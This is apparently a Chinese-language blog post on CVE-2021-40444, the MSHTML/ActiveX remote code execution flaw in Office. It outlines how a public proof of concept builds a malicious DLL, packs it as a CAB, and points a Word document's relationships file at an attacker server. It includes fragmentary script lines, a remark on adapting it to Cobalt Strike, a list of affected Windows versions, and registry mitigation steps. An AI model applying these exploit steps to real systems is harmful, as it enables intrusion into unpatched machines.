CVE-2021-40444 漏洞背景
MSHTML(又称为Trident)是微软旗下的Internet Explorer 浏览器引擎,也用于 Office 应用程序,以在 Word、Excel 或 PowerPoint 文档中呈现 Web 托管的内容。AcitveX控件是微软COM架构下的产物,在Windows的Office套件、IE浏览器中有广泛的应用,利用ActiveX控件即可与MSHTML组件进行交互。
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
poc执行流程
1:创建恶意的dll文件,注入到word中,并生成对应*.cab、*.html
设定word启动加载MSHTML -> serverIP
Generating malicious docx file
os.chdir('data/tmp_doc/')
os.system('zip -r document.docx *')Generating malicious CAB file
cp word.dll msword.inf
lcab \'../msword.inf\' out.cabSet information on HTML exploit
xml_content = xml_content.replace('<EXPLOIT_HOST_HERE>', srv_url + '/word.html')
rels_pw = open('data/tmp_doc/word/_rels/document.xml.rels', 'w')
rels_pw.write(xml_content)
关键位置
将恶意的dll通过lcab变成cab文件提供远程访问
在word资源文件中指定RemoteServer地址请求恶意cab
最终利用office -> GET /word.cab -> 执行恶意代码
改造利用上线CobaltStrike
Tips:
- sudo apt-get install lcab
- poc: https://github.com/lockedbyte/CVE-2021-40444
- 影响版本:
Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
防御办法
临时缓解措施
在 Internet Explorer 中禁用所有区域的 ActiveX 控件安装可缓解此漏洞攻击,可通过创建注册表文件禁用 ActiveX 控件(建议备份后再进行操作):
1.将以下方框中的内容粘贴到文本文件中并使用 .reg 文件扩展名保存:
2.双击 .reg 文件,将其应用到策略配置单元。
3.重新启动系统以确保应用新配置。
注:以上操作会将 64 位和 32 位进程的所有 Internet 区域的URLACTION_DOWNLOAD_SIGNED_ACTIVEX (0x1001) 和 URLACTION_DOWNLOAD_UNSIGNED_ACTIVEX (0x1004) 设置为 DISABLED (3)。并不会安装新的 ActiveX 控件,之前安装的 ActiveX 控件将继续运行。
撤消此缓解措施:
删除在实施此操作时添加的注册表项。
